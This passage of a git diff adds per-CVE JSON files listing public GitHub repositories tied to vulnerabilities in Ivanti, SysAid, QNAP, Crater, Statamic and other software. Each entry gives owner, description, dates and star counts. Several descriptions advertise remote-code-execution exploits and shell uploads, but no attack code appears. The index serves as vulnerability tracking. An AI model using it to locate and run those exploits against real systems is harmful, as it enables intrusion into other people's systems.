+ "full_name": "seajaysec\/Ivanti-Connect-Around-Scan",
+ "owner": {
+ "login": "seajaysec",
+ "id": 7016191,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7016191?v=4",
+ "html_url": "https:\/\/github.com\/seajaysec"
+ },
+ "html_url": "https:\/\/github.com\/seajaysec\/Ivanti-Connect-Around-Scan",
+ "description": "Mitigation validation utility for the Ivanti Connect Around attack chain. Runs multiple checks. CVE-2023-46805, CVE-2024-21887.",
+ "fork": false,
+ "created_at": "2024-01-19T02:12:11Z",
+ "updated_at": "2024-04-05T07:44:30Z",
+ "pushed_at": "2024-02-03T01:59:49Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 745287513,
+ "name": "CVE-2023-46805",
+ "full_name": "Chocapikk\/CVE-2023-46805",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-46805",
+ "description": "Ivanti Pulse Secure CVE-2023-46805 Scanner - Based on Assetnote's Research",
+ "fork": false,
+ "created_at": "2024-01-19T02:23:13Z",
+ "updated_at": "2024-04-12T10:31:25Z",
+ "pushed_at": "2024-01-19T03:17:13Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 745384269,
+ "name": "CVE-2023-46805_CVE-2024-21887_scan_grouped",
+ "full_name": "mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped",
+ "owner": {
+ "login": "mickdec",
+ "id": 33021266,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33021266?v=4",
+ "html_url": "https:\/\/github.com\/mickdec"
+ },
+ "html_url": "https:\/\/github.com\/mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-19T08:11:31Z",
+ "updated_at": "2024-05-21T12:56:29Z",
+ "pushed_at": "2024-05-21T12:56:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 748232137,
+ "name": "CVE-2023-46805",
+ "full_name": "w2xim3\/CVE-2023-46805",
+ "owner": {
+ "login": "w2xim3",
+ "id": 91914344,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91914344?v=4",
+ "html_url": "https:\/\/github.com\/w2xim3"
+ },
+ "html_url": "https:\/\/github.com\/w2xim3\/CVE-2023-46805",
+ "description": "CVE-2023-46805 Ivanti POC RCE - Ultra fast scanner.",
+ "fork": false,
+ "created_at": "2024-01-25T14:53:16Z",
+ "updated_at": "2024-01-31T02:24:37Z",
+ "pushed_at": "2024-01-25T18:04:15Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-46805",
+ "ivanti",
+ "rce",
+ "scanner"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4683.json b/2023/CVE-2023-4683.json
new file mode 100644
index 0000000000..a30216da21
--- /dev/null
+++ b/2023/CVE-2023-4683.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 697961473,
+ "name": "CVE-2023-4683-Test",
+ "full_name": "Songg45\/CVE-2023-4683-Test",
+ "owner": {
+ "login": "Songg45",
+ "id": 22947231,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22947231?v=4",
+ "html_url": "https:\/\/github.com\/Songg45"
+ },
+ "html_url": "https:\/\/github.com\/Songg45\/CVE-2023-4683-Test",
+ "description": "CVE-2023-4683 - Test",
+ "fork": false,
+ "created_at": "2023-09-28T20:49:33Z",
+ "updated_at": "2024-05-08T01:09:58Z",
+ "pushed_at": "2023-09-28T21:29:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46865.json b/2023/CVE-2023-46865.json
new file mode 100644
index 0000000000..0dd2063b63
--- /dev/null
+++ b/2023/CVE-2023-46865.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 716779558,
+ "name": "Crater-CVE-2023-46865-RCE",
+ "full_name": "asylumdx\/Crater-CVE-2023-46865-RCE",
+ "owner": {
+ "login": "asylumdx",
+ "id": 68108995,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68108995?v=4",
+ "html_url": "https:\/\/github.com\/asylumdx"
+ },
+ "html_url": "https:\/\/github.com\/asylumdx\/Crater-CVE-2023-46865-RCE",
+ "description": "Crater <=6.0.6, CVE-2023-46865 Post-Auth RCE (Superadmin)",
+ "fork": false,
+ "created_at": "2023-11-09T21:22:47Z",
+ "updated_at": "2024-03-05T08:55:59Z",
+ "pushed_at": "2023-11-10T07:50:59Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46870.json b/2023/CVE-2023-46870.json
new file mode 100644
index 0000000000..aabc414089
--- /dev/null
+++ b/2023/CVE-2023-46870.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 798984358,
+ "name": "CVE-2023-46870",
+ "full_name": "Chapoly1305\/CVE-2023-46870",
+ "owner": {
+ "login": "Chapoly1305",
+ "id": 25316415,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25316415?v=4",
+ "html_url": "https:\/\/github.com\/Chapoly1305"
+ },
+ "html_url": "https:\/\/github.com\/Chapoly1305\/CVE-2023-46870",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-10T22:18:53Z",
+ "updated_at": "2024-06-13T23:36:56Z",
+ "pushed_at": "2024-06-13T23:36:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46918.json b/2023/CVE-2023-46918.json
new file mode 100644
index 0000000000..ea6e923f14
--- /dev/null
+++ b/2023/CVE-2023-46918.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 691292450,
+ "name": "com.phlox.simpleserver",
+ "full_name": "actuator\/com.phlox.simpleserver",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.phlox.simpleserver",
+ "description": "CVE-2023-46918 | CVE-2023-46919",
+ "fork": false,
+ "created_at": "2023-09-13T22:15:21Z",
+ "updated_at": "2024-01-17T20:00:36Z",
+ "pushed_at": "2023-10-25T00:46:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-46918",
+ "cve-2023-46919"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46948.json b/2023/CVE-2023-46948.json
new file mode 100644
index 0000000000..adba8b6724
--- /dev/null
+++ b/2023/CVE-2023-46948.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 709837062,
+ "name": "CVE-2023-46948",
+ "full_name": "AzraelsBlade\/CVE-2023-46948",
+ "owner": {
+ "login": "AzraelsBlade",
+ "id": 148983455,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148983455?v=4",
+ "html_url": "https:\/\/github.com\/AzraelsBlade"
+ },
+ "html_url": "https:\/\/github.com\/AzraelsBlade\/CVE-2023-46948",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-25T13:50:41Z",
+ "updated_at": "2023-11-27T12:31:44Z",
+ "pushed_at": "2023-11-27T12:33:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46954.json b/2023/CVE-2023-46954.json
new file mode 100644
index 0000000000..e490d7adae
--- /dev/null
+++ b/2023/CVE-2023-46954.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 713406536,
+ "name": "CVE-2023-46954",
+ "full_name": "jakedmurphy1\/CVE-2023-46954",
+ "owner": {
+ "login": "jakedmurphy1",
+ "id": 44781280,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44781280?v=4",
+ "html_url": "https:\/\/github.com\/jakedmurphy1"
+ },
+ "html_url": "https:\/\/github.com\/jakedmurphy1\/CVE-2023-46954",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-02T13:09:52Z",
+ "updated_at": "2023-11-02T13:09:52Z",
+ "pushed_at": "2023-11-08T18:44:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4696.json b/2023/CVE-2023-4696.json
new file mode 100644
index 0000000000..cd980aa7e4
--- /dev/null
+++ b/2023/CVE-2023-4696.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 685896765,
+ "name": "CVE-2023-4696",
+ "full_name": "mnqazi\/CVE-2023-4696",
+ "owner": {
+ "login": "mnqazi",
+ "id": 32686360,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4",
+ "html_url": "https:\/\/github.com\/mnqazi"
+ },
+ "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-4696",
+ "description": "https:\/\/medium.com\/@mnqazi\/cve-2023-4696-account-takeover-due-to-improper-handling-of-jwt-tokens-in-memos-v0-13-2-13104e1412f3",
+ "fork": false,
+ "created_at": "2023-09-01T09:02:03Z",
+ "updated_at": "2023-09-01T09:02:04Z",
+ "pushed_at": "2023-09-01T09:07:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46974.json b/2023/CVE-2023-46974.json
new file mode 100644
index 0000000000..0c19c04949
--- /dev/null
+++ b/2023/CVE-2023-46974.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 713487289,
+ "name": "CVE-2023-46974",
+ "full_name": "yte121\/CVE-2023-46974",
+ "owner": {
+ "login": "yte121",
+ "id": 55489792,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55489792?v=4",
+ "html_url": "https:\/\/github.com\/yte121"
+ },
+ "html_url": "https:\/\/github.com\/yte121\/CVE-2023-46974",
+ "description": "POC",
+ "fork": false,
+ "created_at": "2023-11-02T16:08:19Z",
+ "updated_at": "2023-11-02T16:08:20Z",
+ "pushed_at": "2023-11-02T16:09:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4698.json b/2023/CVE-2023-4698.json
new file mode 100644
index 0000000000..799c351051
--- /dev/null
+++ b/2023/CVE-2023-4698.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 685905090,
+ "name": "CVE-2023-4698",
+ "full_name": "mnqazi\/CVE-2023-4698",
+ "owner": {
+ "login": "mnqazi",
+ "id": 32686360,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4",
+ "html_url": "https:\/\/github.com\/mnqazi"
+ },
+ "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-4698",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-01T09:24:08Z",
+ "updated_at": "2023-09-08T12:33:05Z",
+ "pushed_at": "2023-09-04T05:47:38Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46980.json b/2023/CVE-2023-46980.json
new file mode 100644
index 0000000000..c21b7dde86
--- /dev/null
+++ b/2023/CVE-2023-46980.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 713486009,
+ "name": "CVE-2023-46980",
+ "full_name": "sajaljat\/CVE-2023-46980",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-46980",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-02T16:05:23Z",
+ "updated_at": "2023-11-02T16:05:24Z",
+ "pushed_at": "2023-11-02T16:09:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4699.json b/2023/CVE-2023-4699.json
new file mode 100644
index 0000000000..d73bff4462
--- /dev/null
+++ b/2023/CVE-2023-4699.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 720198895,
+ "name": "Citrix-Bleed-Buffer-Overread-Demo",
+ "full_name": "Scottzxor\/Citrix-Bleed-Buffer-Overread-Demo",
+ "owner": {
+ "login": "Scottzxor",
+ "id": 65826410,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65826410?v=4",
+ "html_url": "https:\/\/github.com\/Scottzxor"
+ },
+ "html_url": "https:\/\/github.com\/Scottzxor\/Citrix-Bleed-Buffer-Overread-Demo",
+ "description": "This code functionally approximates the Citrix Bleed vulnerability (CVE-2023-4699).",
+ "fork": false,
+ "created_at": "2023-11-17T19:55:30Z",
+ "updated_at": "2023-11-20T06:22:48Z",
+ "pushed_at": "2023-11-17T20:01:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46998.json b/2023/CVE-2023-46998.json
new file mode 100644
index 0000000000..b41b8aed73
--- /dev/null
+++ b/2023/CVE-2023-46998.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 713074877,
+ "name": "CVE-2023-46998",
+ "full_name": "soy-oreocato\/CVE-2023-46998",
+ "owner": {
+ "login": "soy-oreocato",
+ "id": 79870826,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79870826?v=4",
+ "html_url": "https:\/\/github.com\/soy-oreocato"
+ },
+ "html_url": "https:\/\/github.com\/soy-oreocato\/CVE-2023-46998",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-01T19:36:38Z",
+ "updated_at": "2023-12-19T12:57:31Z",
+ "pushed_at": "2023-11-01T19:41:12Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47014.json b/2023/CVE-2023-47014.json
new file mode 100644
index 0000000000..47cd9a5bf9
--- /dev/null
+++ b/2023/CVE-2023-47014.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 718503412,
+ "name": "CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS",
+ "full_name": "emirhanerdogu\/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS",
+ "owner": {
+ "login": "emirhanerdogu",
+ "id": 32299032,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32299032?v=4",
+ "html_url": "https:\/\/github.com\/emirhanerdogu"
+ },
+ "html_url": "https:\/\/github.com\/emirhanerdogu\/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-14T08:08:08Z",
+ "updated_at": "2023-12-03T08:21:31Z",
+ "pushed_at": "2023-11-14T08:34:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47102.json b/2023/CVE-2023-47102.json
new file mode 100644
index 0000000000..5e0b6c4db5
--- /dev/null
+++ b/2023/CVE-2023-47102.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 712232271,
+ "name": "cve-2023-47102",
+ "full_name": "quantiano\/cve-2023-47102",
+ "owner": {
+ "login": "quantiano",
+ "id": 84672001,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84672001?v=4",
+ "html_url": "https:\/\/github.com\/quantiano"
+ },
+ "html_url": "https:\/\/github.com\/quantiano\/cve-2023-47102",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-31T04:03:02Z",
+ "updated_at": "2023-11-03T21:12:31Z",
+ "pushed_at": "2023-11-05T11:10:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 720393369,
+ "name": "CVE-2023-47102",
+ "full_name": "nitipoom-jar\/CVE-2023-47102",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-47102",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-18T10:52:40Z",
+ "updated_at": "2023-11-18T12:30:55Z",
+ "pushed_at": "2023-11-18T12:39:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47108.json b/2023/CVE-2023-47108.json
new file mode 100644
index 0000000000..7cf96a713a
--- /dev/null
+++ b/2023/CVE-2023-47108.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 819728794,
+ "name": "govuln-CVE-2023-47108",
+ "full_name": "bahe-msft\/govuln-CVE-2023-47108",
+ "owner": {
+ "login": "bahe-msft",
+ "id": 73816700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73816700?v=4",
+ "html_url": "https:\/\/github.com\/bahe-msft"
+ },
+ "html_url": "https:\/\/github.com\/bahe-msft\/govuln-CVE-2023-47108",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-25T05:05:26Z",
+ "updated_at": "2024-06-25T05:08:40Z",
+ "pushed_at": "2024-06-25T05:08:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47119.json b/2023/CVE-2023-47119.json
new file mode 100644
index 0000000000..bc231089a4
--- /dev/null
+++ b/2023/CVE-2023-47119.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 717901692,
+ "name": "CVE-2023-47119",
+ "full_name": "BaadMaro\/CVE-2023-47119",
+ "owner": {
+ "login": "BaadMaro",
+ "id": 72421091,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72421091?v=4",
+ "html_url": "https:\/\/github.com\/BaadMaro"
+ },
+ "html_url": "https:\/\/github.com\/BaadMaro\/CVE-2023-47119",
+ "description": "A POC for CVE-2023-47119",
+ "fork": false,
+ "created_at": "2023-11-12T23:34:07Z",
+ "updated_at": "2023-11-16T13:35:52Z",
+ "pushed_at": "2023-11-17T16:40:28Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 733767538,
+ "name": "CVE-2023-47119",
+ "full_name": "Cristiano100\/CVE-2023-47119",
+ "owner": {
+ "login": "Cristiano100",
+ "id": 59809524,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59809524?v=4",
+ "html_url": "https:\/\/github.com\/Cristiano100"
+ },
+ "html_url": "https:\/\/github.com\/Cristiano100\/CVE-2023-47119",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-20T04:43:15Z",
+ "updated_at": "2023-12-21T06:28:47Z",
+ "pushed_at": "2023-12-20T04:43:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47129.json b/2023/CVE-2023-47129.json
new file mode 100644
index 0000000000..0eeeab65cd
--- /dev/null
+++ b/2023/CVE-2023-47129.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 718117758,
+ "name": "CVE-2023-47129",
+ "full_name": "Cyber-Wo0dy\/CVE-2023-47129",
+ "owner": {
+ "login": "Cyber-Wo0dy",
+ "id": 148460873,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148460873?v=4",
+ "html_url": "https:\/\/github.com\/Cyber-Wo0dy"
+ },
+ "html_url": "https:\/\/github.com\/Cyber-Wo0dy\/CVE-2023-47129",
+ "description": "Statamic CMS versions <4.33.0 vulnerable to \"Remote Code Execution\" ",
+ "fork": false,
+ "created_at": "2023-11-13T12:21:52Z",
+ "updated_at": "2024-01-23T20:00:05Z",
+ "pushed_at": "2023-11-13T12:24:03Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47179.json b/2023/CVE-2023-47179.json
new file mode 100644
index 0000000000..7d60153652
--- /dev/null
+++ b/2023/CVE-2023-47179.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 713813686,
+ "name": "CVE-2023-47179",
+ "full_name": "RandomRobbieBF\/CVE-2023-47179",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47179",
+ "description": "WooODT Lite <= 2.4.6 - Missing Authorization to Arbitrary Options Update (Subscriber+)",
+ "fork": false,
+ "created_at": "2023-11-03T09:39:30Z",
+ "updated_at": "2023-11-12T22:41:35Z",
+ "pushed_at": "2023-11-03T10:26:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47218.json b/2023/CVE-2023-47218.json
new file mode 100644
index 0000000000..87e3783109
--- /dev/null
+++ b/2023/CVE-2023-47218.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 759618943,
+ "name": "CVE-2023-47218",
+ "full_name": "passwa11\/CVE-2023-47218",
+ "owner": {
+ "login": "passwa11",
+ "id": 112363374,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4",
+ "html_url": "https:\/\/github.com\/passwa11"
+ },
+ "html_url": "https:\/\/github.com\/passwa11\/CVE-2023-47218",
+ "description": "CVE-2023-47218: QNAP QTS and QuTS Hero Unauthenticated Command Injection (FIXED)",
+ "fork": false,
+ "created_at": "2024-02-19T02:15:21Z",
+ "updated_at": "2024-02-19T02:15:22Z",
+ "pushed_at": "2024-02-19T02:20:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-47246.json b/2023/CVE-2023-47246.json
new file mode 100644
index 0000000000..5c499c6386
--- /dev/null
+++ b/2023/CVE-2023-47246.json
@@ -0,0 +1,98 @@
+[
+ {
+ "id": 719913434,
+ "name": "CVE-2023-47246-EXP",
+ "full_name": "W01fh4cker\/CVE-2023-47246-EXP",
+ "owner": {
+ "login": "W01fh4cker",
+ "id": 101872898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4",
+ "html_url": "https:\/\/github.com\/W01fh4cker"
+ },
+ "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2023-47246-EXP",
+ "description": "exploit for cve-2023-47246 SysAid RCE (shell upload)",
+ "fork": false,
+ "created_at": "2023-11-17T07:03:06Z",
+ "updated_at": "2024-06-21T00:11:43Z",
+ "pushed_at": "2023-12-07T02:55:01Z",
+ "stargazers_count": 52,
+ "watchers_count": 52,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "cve-2023-47246",
+ "exploit",
+ "redteam",
+ "sysaid"
+ ],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 52,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 721997669,
